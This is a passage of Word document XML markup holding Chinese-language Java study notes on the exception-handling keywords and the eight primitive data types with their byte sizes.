          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>五个关键字，分别是：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRDefault="00715AE4" w:rsidP="00115125">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>关键字是用于方法体内部，用来抛出一个</w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Throwable</w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类型的异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A939F0" w:rsidRPr="00A939F0" w:rsidRDefault="00A939F0" w:rsidP="00A939F0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00B0265B" w:rsidRDefault="0087699E" w:rsidP="00B0265B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00A939F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00223A40" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  Java8</w:t>
      </w:r>
      <w:r w:rsidR="00C95D8C" w:rsidRPr="00F41A4C">
        <w:t>种</w:t>
      </w:r>
      <w:r w:rsidR="00223A40" w:rsidRPr="00F41A4C">
        <w:t>基本数据类型</w:t>
      </w:r>
      <w:r w:rsidR="00C109DE" w:rsidRPr="00F41A4C">
        <w:t>及所占字节数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00B35194" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>整形</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: byte</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35194" w:rsidRPr="00F41A4C" w:rsidRDefault="00B35194" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>浮点数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: float</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00B35194" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>布尔型</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00262750">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00C95D8C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>float</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C95D8C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
